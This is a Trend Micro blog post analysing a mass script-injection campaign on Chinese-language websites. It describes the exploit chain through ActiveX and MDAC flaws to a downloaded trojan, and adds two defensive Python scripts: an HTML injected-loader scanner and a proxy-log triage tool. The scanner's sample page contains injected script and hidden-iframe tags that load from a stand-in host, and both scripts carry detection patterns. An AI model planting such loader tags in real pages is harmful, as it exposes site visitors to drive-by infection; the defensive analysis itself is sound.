TrendLabs Malware Blog - Trend Micro
    Just a week after half a million Web sites were compromised, here comes another mass Web threat, so there is still no breathing easy for security researchers. Add the fact that an even earlier SQL injection attack preceded the two just mentioned (a mere two days before the last one, and one which also targeted Chinese users), and we have a series of mass compromises in a span of just two weeks.

    This time, we picked up on another script injection attack aimed at Web sites in the Chinese language. Here’s an illustrated summary of this mass compromise:

    Infection Diagram

    Visiting any of the compromised sites causes the injected script to load and execute on the visitor's system. This script, which Trend Micro detects as JS_IFRAME.AC, is fetched from the remote site http://{BLOCKED}.us/s.js.

    Here is a screenshot of the injected script in one of the compromised sites:

    TW Injected Script
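    For site owners who want to check their own pages for this kind of injection, here is an added example (not code from the post or from Trend Micro) that parses HTML and flags loader tags with the traits the screenshot above shows: a script or frame pulled from a host outside the site's own allowlist, a path matching the chain described in this post, a tag appended after the closing html tag, a zero-sized or hidden iframe, and the document.write(unescape(...)) idiom used by obfuscated loaders. The trusted-host list, the sample pages and the hostname evil-host.example are constructed for the example; the post redacts the real hostnames as {BLOCKED}, so only the paths it names are matched.

```python
"""Added example: find injected <script>/<iframe> loaders in HTML pages.

Not code from the post or from Trend Micro. TRUSTED_HOSTS, the sample pages
and the host evil-host.example are constructed; the paths in KNOWN_BAD_PATHS
are the ones the post names (its hostnames were redacted as {BLOCKED}).
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this site legitimately loads scripts and frames from (assumption;
# fill from the site's own inventory in a real deployment).
TRUSTED_HOSTS = {"www.example.com.tw", "static.example.com.tw"}

# Paths named in the post's infection chain; a path-only match is a weak
# indicator on its own, so it is reported together with the other reasons.
KNOWN_BAD_PATHS = ("/s.js", "/real11.htm", "/real.htm", "/lz.htm",
                   "/bfyy.htm", "/14.htm", "/xx.exe")

# Inline-script idiom typical of obfuscated injected loaders.
OBFUSCATION = re.compile(r"document\.write\s*\(\s*unescape\s*\(", re.I)


class LoaderFinder(HTMLParser):
    """Collects (line, tag, src, reasons) tuples for suspicious loaders."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self.html_closed = False   # set once </html> has been seen
        self.in_script = False
        self.script_line = 0

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        line = self.getpos()[0]
        if tag == "script":
            self.in_script = True
            self.script_line = line
        if tag not in ("script", "iframe"):
            return
        src = a.get("src")
        if not src:
            return                      # inline scripts are handled in handle_data
        u = urlparse(src)
        reasons = []
        if u.hostname and u.hostname not in TRUSTED_HOSTS:
            reasons.append("loads from untrusted host %s" % u.hostname)
        if u.path.endswith(KNOWN_BAD_PATHS):
            reasons.append("path matches known chain %s" % u.path)
        if self.html_closed:
            reasons.append("appended after </html>")
        if tag == "iframe" and self._hidden(a):
            reasons.append("hidden iframe")
        if reasons:
            self.findings.append((line, tag, src, reasons))

    def handle_endtag(self, tag):
        if tag == "html":
            self.html_closed = True
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        # Script bodies arrive here as raw text; look for the obfuscated writer.
        if self.in_script and OBFUSCATION.search(data):
            self.findings.append((self.script_line, "script", "(inline)",
                                  ["document.write(unescape(...)) loader"]))

    @staticmethod
    def _hidden(a):
        style = a.get("style", "").replace(" ", "").lower()
        return (a.get("width") == "0" or a.get("height") == "0"
                or "display:none" in style or "visibility:hidden" in style)


def scan_html(html):
    """Return the list of suspicious loader findings for one HTML document."""
    p = LoaderFinder()
    p.feed(html)
    p.close()
    return p.findings


# Constructed sample: a clean page, and the same page with loaders appended
# after </html>, the way the injections in this post were placed.
CLEAN_PAGE = """<html><head>
<script src="http://static.example.com.tw/site.js"></script>
</head><body><p>hello</p></body></html>
"""
INJECTED_PAGE = CLEAN_PAGE + (
    '<script src="http://evil-host.example/s.js"></script>\n'
    '<iframe src="http://evil-host.example/real11.htm" width="0" height="0"></iframe>\n'
    '<script>document.write(unescape("%3Cscript%20src%3D..."))</script>\n'
)

if __name__ == "__main__":
    for finding in scan_html(INJECTED_PAGE):
        print(finding)
```

    Run it over every HTML file the web server serves (and over database-backed page templates, since the SQL injection campaigns mentioned above plant the same tags in stored content). Tags appended after the closing html tag are the single most reliable signal here, because legitimate templates rarely emit anything there.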

    JS_IFRAME.AC then loads JS_IFRAME.AD, which exploits several client-side vulnerabilities in the visitor's browser and its ActiveX controls in order to pull in further scripts. TrendLabs Threats Analyst Jonathan San Jose identifies the following exploit routines in JS_IFRAME.AD:

    1. Exploits the Microsoft Data Access Components (MDAC) vulnerability addressed in MS06-014, which allows remote code execution on an affected system
    2. Instantiates the RealPlayer IERPCtl.IERPCtl.1 ActiveX control (IERPPLUG.DLL) to send shellcode to an installed RealPlayer
    3. Checks for the GLAVATAR.GLAvatarCtrl.1 control
    4. Exploits a buffer overflow in the BaoFeng Storm (MPS.StormPlayer.1) ActiveX control
    5. Exploits a buffer overflow in the Xunlei Thunder DapPlayer ActiveX control

    Notice that the last two exploits target Chinese-language software, which suggests to our researchers that this activity was aimed specifically at China, Taiwan, Singapore, and Hong Kong.

    Depending on which of these vulnerable components is present, JS_IFRAME.AD redirects users to one of the following URLs:

    • http://{BLOCKED}and.cn/real11.htm – detected as JS_REALPLAY.AT
    • http://{BLOCKED}and.cn/real.htm – detected as JS_REALPLAY.CE
    • http://{BLOCKED}and.cn/lz.htm – detected as JS_DLOADER.AP
    • http://{BLOCKED}and.cn/bfyy.htm – detected as JS_DLOADER.GXS
    • http://{BLOCKED}and.cn/14.htm – detected as JS_DLOADER.UOW

    JS_IFRAME.AD was found to download the following:

    • VBS_PSYME.CSZ
    • JS_VEEMYFULL.AA
    • JS_LIANZONG.E
    • JS_SENGLOT.D

    These four, in turn, download and execute http://{BLOCKED}c.52gol.com/xx.exe, which is detected as TROJ_DLOADER.KQK.
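    For network defenders, the chain above maps onto three stages that show up in proxy logs: the loader script, an exploit landing page, and the payload executable. The following added example (not code from the post or from Trend Micro) walks a constructed proxy log, classifies each request by the paths named in this post, and gives each client a verdict based on the highest stage it actually completed, so that a client whose payload download was blocked (non-200 status) is not reported as infected. The log format, the client addresses and the hostnames loader-host.example, landing-host.example and payload-host.example are all constructed; since the post redacts the real hostnames, matching is by path only, which is noisy for generic names like 14.htm and should be confirmed against the current block list.

```python
"""Added example: stage-based triage of proxy logs for the chain in this post.

Not code from the post or from Trend Micro. The log format, the client IPs
and the hostnames are constructed; the paths are the ones the post names.
"""
from collections import defaultdict
from urllib.parse import urlparse

# Stage number -> analyst-facing verdict.
STAGES = {
    1: "loader script fetched (exposure only)",
    2: "exploit landing page fetched (exploit attempted)",
    3: "payload executable fetched (likely infected)",
}

# Paths from the post mapped to their stage in the chain.
STAGE_BY_PATH = {
    "/s.js": 1,
    "/real11.htm": 2, "/real.htm": 2, "/lz.htm": 2, "/bfyy.htm": 2, "/14.htm": 2,
    "/xx.exe": 3,
}


def classify_url(url):
    """Return the chain stage (1-3) for a URL, or 0 if it is unrelated."""
    return STAGE_BY_PATH.get(urlparse(url).path, 0)


def parse_line(line):
    """Constructed log format: 'HH:MM:SS client_ip method url status'."""
    ts, client, method, url, status = line.split()
    return ts, client, method, url, int(status)


def triage(lines):
    """Map each client that touched the chain to (highest completed stage, events).

    A stage only counts as completed when the response status was 200; a
    blocked or missing payload (403/404) leaves the client at the previous stage.
    """
    events = defaultdict(list)
    for line in lines:
        if not line.strip():
            continue
        ts, client, _method, url, status = parse_line(line)
        stage = classify_url(url)
        if stage:
            events[client].append((ts, url, status, stage))
    result = {}
    for client, evs in events.items():
        completed = [e[3] for e in evs if e[2] == 200]
        result[client] = (max(completed) if completed else 0, evs)
    return result


def summarize(lines):
    """Return {client_ip: verdict text} for clients that completed at least one stage."""
    return {client: STAGES[stage]
            for client, (stage, _evs) in triage(lines).items() if stage}


# Constructed sample log: one fully infected client, one whose payload fetch
# was blocked by the proxy, one that only loaded the script, and one bystander.
SAMPLE_LOG = """\
10:01:02 192.0.2.10 GET http://compromised-site.example.tw/index.html 200
10:01:03 192.0.2.10 GET http://loader-host.example/s.js 200
10:01:04 192.0.2.10 GET http://landing-host.example/real11.htm 200
10:01:06 192.0.2.10 GET http://payload-host.example/xx.exe 200
10:02:11 192.0.2.11 GET http://loader-host.example/s.js 200
10:02:12 192.0.2.11 GET http://landing-host.example/lz.htm 200
10:02:13 192.0.2.11 GET http://payload-host.example/xx.exe 403
10:03:00 192.0.2.12 GET http://loader-host.example/s.js 200
10:04:00 192.0.2.13 GET http://www.example.org/news.html 200
"""

if __name__ == "__main__":
    for client, verdict in sorted(summarize(SAMPLE_LOG.splitlines()).items()):
        print(client, "->", verdict)
```

    Clients at stage 3 go to incident response; clients at stage 2 are worth a check for the vulnerable components listed above even though the payload never arrived, because a successful exploit could still have run shellcode before the download was blocked.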

    As of this writing, a Google search turns up some 327,000 pages that contain the malicious script tag.

    Google Search Results

    Trend Micro Web Threat Protection (WTP) already blocks access to the malicious URLs listed above. Users are advised to be cautious when browsing, and to install critical vendor patches as soon as they are available; the MDAC flaw in particular is already fixed by the MS06-014 update, so a system that is current on Microsoft updates is not affected by that step of the chain.

    Our researchers are still investigating other details of this case; more information will be posted as soon as it becomes available. Trend Micro is also reaching out to Taiwan CERT to inform them of this mass compromise.

    Consolidated findings of the Research (Taiwan), Escalation, and Threat Response teams at TrendLabs.

    Updated by Mayee Corpin and Jovi Umawing (Technical Communications)

    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice